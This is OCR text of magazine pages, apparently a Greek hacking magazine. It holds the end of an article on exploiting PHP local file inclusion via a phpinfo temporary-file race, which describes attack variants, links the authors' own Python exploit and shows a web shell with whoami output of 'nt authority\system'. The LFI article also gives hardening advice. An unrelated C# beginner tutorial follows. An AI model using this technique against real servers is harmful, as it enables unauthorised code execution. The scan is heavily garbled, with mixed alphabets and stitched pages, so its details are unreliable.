Got itt Shell created in /tmp/g 


Woott Ἀπ 
Shuttin’ down... 


Min? > 


Εικόνα 4 

Χρησιμοποιούμε το myattack.py (τη δική µας παραλλαγή Tou exploit) και πραγ- 
ματοποιούμε επίθεση σε Evav server µε το CentOS και Tov Apache. Όπως βλέπε- 
τε, το αρχείο µε τον κώδικα ενὀς απλού web shell δημιουργήθηκε µε επιτυχία! 


БВ 


Πλάγιο-μετωπική µε web server, οδηγώντας PHP! 
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Παραλλαγές της επίθεσης 


Όλα ὁσα συμβαϊνουν στον ατυχἠ web server, καθώς και τα στάδια της ἰδιας της 
επίθεσης, PaivovTal στην εικὀνα 2. Όπως εἶναι φανερό, για να πραγµατοποιηθεί µε 
επιτυχία η επίθεση πρέπει να προλάβουμε να αξιοποιήσουµε το προσωρινὀ αρχείο, 
πριν διαγραφεί. Αυτό απαιτεὶ μεγάλη ταχύτητα апо μέρους του κὠδικά µας. Το va 
σημειώσουμε το ὀνομα του προσωρινού αρχείου και να TO εισάγουµε χειροκίνητα σε 
κάποιο URL nou αξιοποιεί την ευπάθεια LFI, δεν πρὀκειται να δουλέψει. Па va πραγ- 
ματοποιηθεἰ GUTO το κρἰσιµο στάδιο της επίθεσης, έχουμε δύο επιλογές: 


i. H υλοποίηση της PHP στα Windows έχει ἑνα икро Бид (http://onsec.ru/ 
onsec.whitepaper-02.eng.pdf) που ανακαλύφθηκε το 2007 και δεν ἐχει δι- 
ορθωθεἰ ακόμα. Ev ολἰγοις, ο διπλὸς τελεστὴς ανακατεύθυνσης (<<) αντι- 
καθίσταται αυτόματα апо ἑναν αστερἰσκο (3), ο οποίος λειτουργεἰ σαν una- 
λαντὲρ. Εμεὶς μπορούμε να χρησιμοποιήσουμε τη διπλἠ ανακατεύθυνση και 
ουσιαστικά τον μπαλαντὲρ, για να αξιοποιήσουµε αµέσως το προσωρινὀ. 
Σημειώστε оті ακολουθώντας аот τη λύση δεν χρειάζεται να πληροφορη- 
θούμε TO ὀνομα του αρχείου. 


ii. Αυτή η επιλογἠ δεν βασίζεται σε κἀποιο bug (που αὐριο θα μπορούσε va 
διορθωθεί) κι ακριβώς γι’ GUTO εἶναι η αγαπημένη του γράφοντα. Αυτή τη 
фора πραγματοποιούμε αδιάκοπες και πολλαπλὲς επιθέσεις, EWG ὁτου Kå- 
ποιο process προλάβει να αξιοποιήσει το προσωρινὀὸ αρχεἰο πριν διαγραφεί. 
Το μικρὸ στρες που θα προκαλέσουµε στον server θα αυξήσει τις πιθανὸ- 
τητες επιτυχίας και, καθὼς δεν στηριζὀµαστε σε κάποιο bug, γνωρίζουμε 
ότι η επίθεση θα συνεχίσει να λειτουργεί. Βέβαια, η συγκεκριμένη λύση na- 
ρουσιάζει κι ἑνα μειονέκτημα: Προὐποθέτει τη λειτουργία της συνάρτησης 
phpinfo για την εύρεση του ονόματος του προσωρινού αρχείου, επομένως 
δεν εἶναι σίγουρο бт! θα δουλέψει παντού. 


Το δικὀ µας exploit 


Το exploit βασίζεται σε όλα ὁσα εἰπαμε παραπάνω και εἶναι γραμμένο σε Python. Ou- 
σιαστικἁ, αποτελεἰ µια τροποποιημένη (και ката την ταπεινἠ µας ἀποψη βελτιωμένη) 
εκδοχἠ του exploit που εἶχε δημοσιευτεί апо το insomnia security (http://goo.g1/ 
VncsjK). O! βελτιώσεις µας εντοπἰζονται στα εξἠς σημεία: 


ο Εκτελεϊται τόσο σε Windows ὁσο και σε Linux, χωρὶς κάποια τροποποίηση. 


ο Ενσωματώνει και τις δύο επιλογὲς που αναφέἑραµε παραπάνω για την αξιοποίη- 
ση του προσωρινού αρχείου και επιλἐγει αυτόματα την καταλληλότερη. 


ο O χρήστης μπορεἰ να καθορίσει поло περισσότερες παραμέτρους, ὁπως то 
πλήθος των χαρακτήρων που θα χρησιμοποιηθούν για το φούσκωμα των HTTP 
headers, To ὀνομα του καταλόγου µε τα προσωρινά αρχεἰα Tou server, το λει- 
τουργικὀ σύστημα του server к.а. 


Μπορείτε να κατεβάσετε το αναβαθμισμένο πρόγραμμα ano то http://bit.ly/ 
dh@40cusexp. Πριν αρχίσετε τις δοκιμές, θα σας προτεἰναμε να µελετήσετε TOV KW- 
δικα διεξοδικἁ, για να αφομοιώσετε ὁσα NEPIYPGWAHE. Όπως αναφέραμε και στην 
αρχή, η συγκεκριμένη επἰθεση επιτυγχάνει UNO προὐποθέσεις. Ωστόσο, η μελέτη 
της αποτελεί ша καλἠ ευκαιρία για να εστιάσουµε σε μερικὲς κρἰσιµες λεπτομέρειες 
της λειτουργίας της PHP. Εξάλλου, η ὑπαρξη της επίθεσης αναδεικνύει και την τερά- 


69 


@KER 


ο  λλλλλλλΧλΧλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλλ 


ота просоҳ που πρέπει να δείχνουμε ката τη ρύθμιση της PHP: Εἶναι φρόνιμο va 
απενεργοποιούµε πάντα τις πιθανώς επικἰνδυνες συναρτήσεις (phpinfo, passthru, 
κ.λπ.) ενώ ο interpreter της γλὠσσας πρέπει να εκτελείται апо éva λογαριασμὀ 
Χρήστη µε τα απολύτως απαραίτητα δικαιώματα πρόσβασης κι ὀχι περισσότερα. Κι 
av δεν έχετε καταλάβει ακόµα γιατὶ σας τα Аёнє όλα αυτά, δεῖτε τον πἰνακα µε τα 
αποτελέσµατα των δοκιμών µας. Δεν εἶναι κι ἄσχημα :D 


Αποτέλεσμα 
Λειτουργικό Σύστημα Web Server μα Εκτέλεσης Xploit 
WAMPx64 v. 
Windows Apache ез, ο ο) 12 Επιτυχημένο 
i XAMPP v.5.6.3 : 
Windows Apache 2.4.10 (win32) ο. 


File Edit View History Bookmari 
http://127.0....mp/g&f=whoami X 


4 6 | @ 12700.1/Ifi. phpioad=/windows/temp/g&f=whoami 115 л pro BS νο | 
‚А L 


nt authorityuusr 


(Ὁ) http://127.0.../g&f=whoami x 


“>88 = с 


€ ὦ 127.0.01:8001/lfi.php?load=/wamp/tmp/g8f=whoami αὶ K 


nt authority\system 


78 


` CMYK & WEB 
cmykandweb.gr 


M >> 
NN 


ЛУ” 


vase DESIGN 
sign ө layout ο web 


by multiPetros 


Ανάπτυξη εφαρμογών σε C# για To .NET [μέρος 2ο] 


Ηνάπτυξη εφαρμογών σε CH για το .NET [μέρος 2ο] 
ПЕКО ККВЛДУООВООДООССОС С __ 2А 


Па την ора έχουμε περιγράψει όλα τα προσόντα της πλατφόρμας «ΝΕΤ, αλλά δεν 
έχουμε δει κανένα апо αυτά στην πράξη. Εξίσου περιορισμένη εἶναι και η επαφἠ µας 
µε τη γλῶσσα C#, που θα µας συντροφεύσει στα υπόλοιπα µέρη αυτἠς της σειρὰς 
ἄρθρων. Μιλάμε για µια γλὠσσα η οποία, δεν σας το κρύβουμε, ἐχει ενθουσιάσει προ 
πολλού τον γράφοντα και ἐχει κερδίσει µια θέση στην καρδιὰ του, ακριβώς δίπλα 
στην Python! (Σ.τ.Ε. Εντάξει, προς στιγμήν τρόμαξα.) Πριν αρχίσετε να διαμαρτύρε- 
στε και να φωνάζετε бт! το περιεχόμενο της τελευταίας πρότασης συνιστά ιεροσυ- 
Ла, δώστε µας λίγο χρόνο να εξηγηθούμε:, Ίσως ото τέλος να πεἰσουµε κι εσάς ;) 


Στο кро δείγμα κὠδικα που έχουμε δει ως тора, εἶναι πολύ πιθανὀ να εντοπἰσατε 
την ομοιότητα ανάμεσα στο συντακτικὀ της C# και της РНР. Μην σας κάνει εντύπω- 
ση αυτό. Οι δύο γλὠσσες παρουσιάζουν πάρα πολλὲς διαφορέἑς και σε πολλὰ επἰπε- 
δα, αλλά xouv κληρονομήσει πολλά στοιχεία του συντακτικού τους апо τη γιαγιά 
C. Τα μπλοκ κὠδικα οριοθετούνται µε ἄγκιστρα (brackets). Κάθε γραμμὴ κὠδικα 
τερματίζεται πάντα µε τον χαρακτήρα του ελληνικού ερωτηματικού (semicolon). Ta 
κενὰ, σε αντίθεση µε την αγαπημένη µας Python, στην οποία αποτελούν τµήµα του 
συντακτικού, δεν παϊζουν κανένα ρὀλο κι εξυπηρετούν µόνο στην εὐκολη ανάγνω- 
ση του κὠδικα апо τους ανθρώπους. AUTH η ομοιότητα επεκτεἰνεται και στα OXO- 
ма, που επιτρέπεται εἶτε να περιορἰζονται σε μία μόνο γραμμὴ εἶτε να εκτείνονται 
σε πολλὲς. Στην πρώτη περίπτωση, τα σχόλια ξεκινούν µε τη χρήση δύο καθέτων 
(backslash), ενώ στη δεύτερη το μπλοκ µε τα σχόλια ξεκινὰ µετους χαρακτήρες "/*" 
και τερματίζεται µετους "*/", 


Κώδικας // αυτό είναι σχόλιο µιας γραμμής 
Κώδικας 
JE 

autó εἴναι 

σχόλιο πολλαπλών 

γραμμών 

Κώδικας 


Κώδικας 


Μήπως έχουμε δημιουργήσει την εντύπωση ὁτι η C# και η PHP εἶναι πολύ орос; 
Ελπίζουμε пос OXI, үгаті οι ομοιὀτητὲς τους περιορίζονται κυρίως στο συντακτικό και 
τελειώνουν κάπου εδώ. Αν συνεχίσουμε τη γνωριµἰα µας µε τη C# θα αναδειχτοὺν 
και o! θεμελιώδεις διαφορἑς τους. 


Μεταβλητέὲς και τελεστὲς 


H 64, σε αντίθεση µε Tic Python και РНР, ανῆκει σε µια ομάδα γλωσσών που xapa- 
κτηρἰζονται ως strongly typed. Αυτό σημαίνει боо πράγµατα: Αφενός, για να χρη- 
σιµοποιήσουμε µια μεταβλητή πρέπει να прота να την έχουμε δηλώσει. Αφετέρου, 
ката τη δήλωση µιας µεταβλητὴς πρέπει να προσδιορίσουμε οπωσδήποτε τον τύπο 
της ἡ την κλάση στην опоіа ανήκει: 


1. Ίσως κἄπου εδώ να επιβάλλεται η αναφώνηση της διάσηµης φράσης "Πάταξον μεν, ἄκουσον δε". 
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int my_integer = @ ; 


Dog my_object = new Dog(parametroi) ; 


Οι παραπάνω δηλώσεις δημιουργούν δύο μεταβλητές: H πρώτη ἐχει τη δυνατότητα 
αποθήκευσης ακέραιων αριθμών, ενώ η δεύτερη περιέχει ἑνα αντικείµενο της κλὰ- 
σης Dog. Οι δηλώσεις του παραδείγματος λειτουργούν και σαν ορισμοί, αφού αποδὶ- 
δουν στις μεταβλητὲς τιµή. AUTO όμως δεν εἶναι απαραίτητο. Θα μπορούσαμε μόνο 
να ἐχουμε δηλώσει τη μεταβλητή my_integer χωρὶς va της δώσουμε ταυτόχρονα 
την τιµή μηδὲν, ὁπως επἰσης θα μπορούσαμε να εἰχαμε δηλώσει τη μεταβλητή ΠΙΥ 
object, χωρίς να αρχικοποιήσουμµε το αντικείµενο Dog. Н δήλωση µιας μεταβλητής 
στη C# μπορεἰ να συνοδεύεται και ano κἀποιον "τροποποιητὴή πρὀσβασης" (access 
modifier). Οι επιλογὲς για το εἶδος πρὀσβασης εἶναι παρόμοιες μ' εκείνες που συνα- 
ντάμε σε ἄλλες γλὠσσες προγραμματισμού και φαίνονται στον ακόλουθο πἰνακα: 


H πρόσβαση στο στοιχείο δεν περιορίζεται 
H πρόσβαση στο στοιχείο περιορίζεται στα υπόλοιπα στοιχεία 
protected της Κλάσης που αυτό ανήκει, καθώς και στα στοιχεία των 
υποκλάσεων 
η H πρόσβαση περιορίζεται στην τρέχουσα λειτουργική µονάδα του 
προγράµµατος 
Н πρόσβαση περιορίζεται εντός TOU συγκεκριμένου µπλοκ κώδικα 


Па την ονομασία των μεταβλητῶν της C# ισχύουν οι λίγο-πολύ αναμενόμενοι κανὀ- 
vec. Ένα ὀνομα μεταβλητής рпорєі να περιέχει γράμματα του λατινικού αλφαβήτου, 
αριθµητικἁ ψηφία ἡ και τον χαρακτήρα της "κάτω παύλας" (underscore). O πρὠτος 
χαρακτήρας του ονόματος δεν μπορεὶ να εἶναι NOTE αριθµητικὀ ψηφίο, evo γίνεται 
και διάκριση μεταξύ πεζὼν και κεφαλαίων χαρακτήρων. O χειρισμός των µεταβλη- 
τῶν στη C# πραγματοποιείται µε TH βοήθεια των τελεστών, που εἶναι ἴδιοι µε αυτούς 
που γνωρίζουμε апо την PHP κι ἄλλες γλὠσσες. 


Ολίσθηση << 


Εκχώρησης 
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Σταθερέὲς 


Όπως και οι μεταβλητές, οι σταθερὲς παραπέμπουν σε συγκεκριμένες θέσεις της 
μνήμης. Ωστόσο, τα δεδοµένα που περιέχονται σ' αυτὲς τις θέσεις καθορίζονται ката 
τη δήλωση της σταθεράἀς κι Ох! ката το χρόνο εκτἐλεσης του προγράµµατος. Έτσι, η 
τιµή µιας σταθερὰς εἶναι αδύνατο να τροποποιηθεί σε οποιαδήποτε φάση της EKTEAE- 
σης του προγράμματος. Πα τον ορισμὀ µιας σταθεράς χρησιμοποιούμε τη λέξη κλειδὶ 
const, ακριβώς πριν апо τον τύπο (ñ την κλάση): 


const string ΜΥ ΜΑΩΑΖΙΝΕ = "deltaHacker" ; 


Ката παράδοση, στα ονόματα των σταθερὠν συνηθἰζουµε να χρησιμοποιούμε KE- 
фалаіоџс̧ Χαρακτήρες, αν και δεν εἶναι υποχρεωτικὀ апо την ἴδια τη γλῶσσα. Το 
γεγονὀς бт! ο καθορισμός της τιμῆς µιας σταθερἁὰς δεν μπορεὶ να γίνει ката το xpÓ- 
νο εκτέλεσης του προγράµµατος, αφαιρεί πολλοὺς πόντους апо την ευελιξία των 
σταθερὠν. H C# προσφέρει µια ενδιάµεση λύση: Τις μεταβλητές που μπορούν μόνο 
να αναγνωστοῦν (read only). Μια μεταβλητή που θα δηλωθεί ως read only μπορεὶ 
να πάρει µια οποιαδήποτε τιµή ката την εκτέλεση του προγράµµατος. Όμως, ἀπαξ 
και λάβει µια τιµή, αυτἠ δεν μπορεὶ πλέον να τροποποιηθεί. H δήλωση µιας τέτοιας 
μεταβλητής γίνεται µε τη χρήση της λέξης κλειδὶ readonly: 


string x = "delta" ; 
string y = "Hacker" ; 
Pi 
readonly string magName = x + y ; /* ΣΩΣΤΟ: Οι μεταβλητές read only 
επιτρέπουν τον ορισμό 
τιµής κατά την εκτέλεση του 
προγράµµατος. */ 
const string MAG = x + y ; /* <- ΛΑΘΟΣ: Οι σταθερές ΔΕΝ επιτρέπουν τον 
ορισμό τιμής κατά την εκτέλεση 
του προγράμματος! */ 
magName = "xyz" ; /* <- ΛΑΘΟΣ: Н τιμή magName έχει οριστεί ήδη και δεν 
γίνεται να τροποποιηθεί! */ 


Απαριθµἠσεις 


Οι απαριθµἠσεις --γνωστὲς ως enumerations-- αποτελούν vav Koyo τρόπο για τη 
δημιουργία και το χειρισμὀ µιας συλλογής ano αριθµητικἁἀ μεγέθη. КЛасіко пара- 
δειγµα αποτελεὶ ша απαρίθμηση µε Tic ημέρες της εβδομάδας: 


enum Day{ Sun, Mon, Tue, Wed, Thu, Fri, Sat } ; 


Н αναφορά στην τιμὴ ενὸς μέλους της απαρίθµησης επιτυγχάνεται µε τη χρήση της 
τελείας: 


Day today = Day.Mon ; 
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Φυσικὰ, σε κάθε μέλος µιας απαρίθµησης μπορούμε να δώσουμε ὁὀποια αριθµητικἠ 
τιµή θέλουμε. AUTH η αντιστοἰχηση μπορεί να πραγματοποιηθεἰ και ката τη δήλωση 
της απαρίθµησης: 


enum Categories{ A=1, B=3, (6, О=А+В } ; 


Εκτὸς апо τον αυστηρὀ καθορισμό όλων των τιμῶν, ἐχουμε και την επιλογἡ του KA- 
θορισμού της τιμῆς του πρώτου στοιχείου και τον αυτόματο καθορισμὀ των υπολοί- 
πων (µε αὐξηση της τιμής εκκίνησης κατὰ µια μονάδα). Έτσι, για να δημιουργήσουμε 
μια απαρίθμηση των ηµερών της εβδομάδας, ξεκινώντας µε το 1 για την Κυριακὴ και 
φτάνοντας στο 7 για το Σάββατο, θα μπορούσαμε να γράψουμε каті τέτοιο: 


enum Day{ Sun=1, Mon, Tue, Wed, Thu, Fri, Sat } ; 


Ano προεπιλογἠ, κάθε στοιχεἰο µιας απαρἰίθµησης ορἰζεται we int. Κάτι τέτοιο упорі 
να αλλάξει δηλώνοντας τον επιθυμητὸ τύπο των μελῶν, AKPIBMc μετὰ то буора της 
απαρἰθμησης και πριν апо τον προσδιορισµὀ των µελών της: 


enum Day:sbyte{ Sun, Mon, Tue, Wed, Thu, Fri, Sat } ; 


Στοιχεία δομημένου προγραμματισμού 


Όπως καταλαβαίνετε, ἑφτασε η ὥρα να δούμε εν τάχει τις δομές ελέγχου και ENava- 
ληψης, που εἶναι γνωστὲς και σαν flow control structures. Σε ὁ,τι αφορά στον ἐλεγ- 
χο της ροὴς εκτέλεσης ενὸς προγράμματος, η 64 διαθέτει δύο δομὲς που λογικἁ θα 
γνωρίζετε апо ἄλλες γλὠσσες προγραμματισμού. Υποστηρίζει ὁμως κι Evav τελεστὴ 
που, ενὠ υπάρχει και σε ἄλλες γλὠσσες, δεν εἶναι ιδιαιτερα γνωστὸς. Ac ξεκινήσου- 
με µετις δομές if, που ἐχουν την εξἠς γενικὴ µορφή: 


if (συνθήκη A) { 
µπλοκ κώδικα A 
[ 
else if (συνθήκη В) í 
µπλοκ κώδικα B 
it 
else { 
μπλοκ κώδικα Г 
} 
H δεύτερη борі ελέγχου εἶναι η εξίσου γνωστὴ switch. Με τη βοἠθειἁ της μπορούμε 
να οµαδοποιήσουµε Eva σύνολο ελέγχων στην τιμὴ µιας µεταβλητής. Н γενικἠ µορ- 
gn της δοµἠς switch έχει ως εξἠς: 


switch (μεταβλητή) í 


case τιµή 1: 
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OL 


File Edit View Refactor Project Build Debug Search Analysis Tools Window Help 
Ul ez m ia G| x Rà @ > |⁄2 Ol р # О режем -σΙ8:8/ΞΙΘΦΑΒΘΙ9 š 
Projects ах Program.cs ~ x с 
SAES 9% dh040.Program v| | Printo ν 5 
S-L Solution dh040 2 š 
dh040 i A || Š 
= namespace dho4o{ 3 
b ΕἸ class Program{ |] 
const string MAG = "ABC" ; ° 
readonly string magName = "deltaHacker" ; Е 
в Е private void Print(){ 
о MAG = "zyx" ; // «- Αυτό δεν επιτρέπεται! 
10 magName = "xyz" ; γ" <- Ούτε αυτό επιτρέπεται, η τιµή 
1 * της ορίστηκε προηγουμένως, δεν 
1 «μπορεί να αλλάξει"/ 
|1 } 
n = public static void Main(string[] args){ 
Errors ο = τν І _ τν ax] 
Ө 2 Errors ||| A 0 Warnings |||Ч2 0 Messages 
! Line Description File Path 
[x] 9 Н αριστερή πλευρά µιας αντιστοίχισης πρέπει να εἶναι μεταβλητή, ιδιότητα ή δεικτοδότης (CS0131) Program cs dh040 
[х] 10 Δεν είναι δυνατή η αντιστοίχιση σε πεδίο µόνο για ανάγνωση (εκτός εάν βρίσκεται σε κατασκευή ή σε προετοιμασία peta... Program cs dh040 


| B Errors |] Output | [83] Task List | [Β] Definition View [=] Search Result ] 
Τέλος In 10 col31 ch22 INS 


H αλλαγή της τιμής των δηλωμένων σταθερών const Και readonly δεν εἶναι 
εφικτή. H λεπτή διαφορά μεταξύ τους, βρίσκεται ото бт! οι σταθερές readonly 
εἶναι δυνατὸν να αρχικοποιηθούν ката το χρόνο εκτέλεσης, ενώ οι const 
έχουν σταθερή τιµή апо κατασκευής του προγράμματος. 


εντολή Α; 
break; 
case τιµή 2: 
εντολή Β; 
break; 
default: 
εντολή XUZ; 


break; 


O τελεστἠς που αναφέραμε προηγουμένως ἐχει τον παράξενο χαρακτηρισμὀὸ "Tpiq- 
δικός", αν και στην ουσία εκτελεἰ Evav ἐλεγχο και ша απλἠ διακλάδωση. Αναφερὀ- 
μαστε στο λατινικὀ ερωτηματικό, που χρησιμοποιείται µε τον ακόλουθο τρὀπο: 


μεταβλητή = (συνθήκη) } τιµή А : τιµή В 


Αν το αποτέλεσµα της συνθήκης εἶναι αληθές, η μεταβλητὴ παἰρνει την τιμὴ Α. Al- 
афорєтіка, η μεταβλητὴ παἰρνει την τιµή Β. 

Αν και δεν το σχεδιάζαµε, παρουσιάζοντας тп борӣ switch φάνηκε η χρήση ενὸς ou- 
ντακτικού στοιχείου των παλιών (αν ὀχι αρχαίων) γλωσσών προγραμματισμού. Ava- 
φερόμαστε στις ετικέτες, που µπορείτε va τις φαντάζεστε σαν anchor links εντὸς 
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του κὠδικα. Με апла λόγια, αποτελούν συγκεκριµένα σημεία του κὠδικα, στα onoia 
μπορούμε να μεταβούμε ауа πάσα στιγμή µε τη βοήθεια της εντολἠς goto. ΟΙ ETIKE- 
τες ορίζονται µε µια λέξη η οποἱα βρίσκεται στην αρχἠ της γραμμὴς και ακολουθείται 
µόνο ano τον χαρακτήρα της ἀνω-κάτω τελείας (colon). Πριν προχωρήσουμε, πρέπει 
να πούμε ὁτι τόσο οι ετικέτες OOO και η εντολἠ goto, αποτελούν συστατικά του µη 
δομημένου προγραμματισμού. Μάλιστα, η εντολἠ goto θεωρείται KOKKIVO Navi στη 
Java και ev% αποτελεὶ δεσμευμένη λέξη του συντακτικού της γλὠσσας, την ἰδια 
στιγμὴ εἶναι απαγορευμένη και δεν υλοποιείται µε κἄποιον τρόπο. H C# φαίνεται 
να ξεπερνά αυτές τις ιδεολογικές αγκυλώσεις κι επιτρέπει τη χρήση της goto xwpic 
κανένα πρὀβλημα. Πάντως, η αλήθεια εἶναι ὁτι η χρήση της συγκεκριμένης εντολἠς 
πρέπει να αποφεύγεται, αφού καταστρέφει ανεπανόρθωτα τη δομὴ και την "καθα- 
ρότητα" ενὸς προγράμματος. 

Σε ὀτι αφορά στις επαναλήψεις, η 64 διαθέτει τἐσσερεις δομὲς που θα σας φανούν 
γνώριµες апо την PHP και την Python. H πρώτη ano αυτές εἶναι η do, που ἐχει την 
EENG ιδιαιτερότητα: O κὠδικας που βρίσκεται στο OXETIKO μπλοκ εκτελεἰται πάντα, 
τουλάχιστον μία фора... 


4ο { 
κώδικας 


y while (συνθήκη) 


Παρόμοια δομή επαναλήψεων εἰναι n while, µε τη διαφορά OT! O κὠδικας TOU OXETI- 
KOU μπλοκ ενδέχεται να µην εκτελεστεὶ καμία фора. AUTO συμβαίνει ylaTi η συνθήκη 
επανάληψης προηγεἰται του κὠδικα. 


while (συνθήκη) { 
κώδικας 


} 


Όταν ο αριθµὸς των επαναλήψεων εἶναι προκαθορισµένος, μπορούμε να χρησιµο- 
ποιήσουμε τη δομή for: 


for (μετρητής ; συνθήκη ; αλλαγή τιμής μετρητή) { 
κώδικας 


} 


Ως γνωστὸν, ο μετρητἠς αποτελεὶ µια μεταβλητή που συνήθως αρχικοποιείται ката 
τη συγκρὀτηση της δομὴς for. Н τιµή αυτής της μεταβλητής αλλάζει µε τον τρόπο 
που καθορίζει ο κὠδικας στη θέση "αλλαγή τιµἠς μετρητή" (συνήθως πρὀκειται 
για αύξηση ἡ για µείωση της тийс ката ша μονάδα). Αυτές οι µεταβολές επανα- 
λαμβάνονται μέχρι η τιμὴ της µεταβλητὴς να ικανοποιήσει τη συνθήκη... "συνθήκη". 
H τελευταία δομή επαναλήψεων εἶναι η foreach. Με τη βοἠθειἁ της μπορούμε να 
διατρέξουµμε εὐκολα τα στοιχεία ενὸς ολόκληρου πἰνακα, χωρὶς να γνωρίζουμε TO 
ακριβὲς τους πλήθος. Εκτὸς ano πἰνακες, η foreach рпорєі να λειτουργήσει και µε 
αντικείμενα που υλοποιούν το interface ονόματι System.Collections.IEnumerable. 
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H εξέλιξη της γλὠσσας C# εἶναι αδιάκοπη και σε κάθε ἐκδοση 
προστίθενται νέα χαρακτηριστικά. 


Στην περίπτωση της С#, η σύνταξη της foreach διαφέρει ελάχιστα апо αυτήν που 
γνωρίζουμε ano την PHP: 


foreach (στοιχείο in συλλογή) í 


κώδικας 


O κὠδικας του παραπάνω μπλοκ θα εκτελεστεὶ τόσες φορές, ὁσα εἰναι και τα OTOI- 
хєіа της "συλλογής". Σε κάθε επανάληψη, η μεταβλητή "στοιχείο" αποκτά σαν тїнї 
ἑνα ano τα στοιχεία της "συλλογής". 


H παρουσίαση των βασικών στοιχείων του συντακτικού µιας γλὠσσας δεν αποτελεὶ 
και το πιο ενδιαφέρον στάδιο της εκμάθησης, алла εἶναι αναγκαἰο. Στα επὀµενα àp- 
θρα θα επανορθώσουμε µε περισσότερο αληθινὸ κὠδικα και παραδείγματα που θα 
στηρἰζονται σε ὁσα ἐχουμε πει. 
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αχ ПОЗ 
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ΜΕ TA ΙΜΤΕΡΝΕΤΙΑ 
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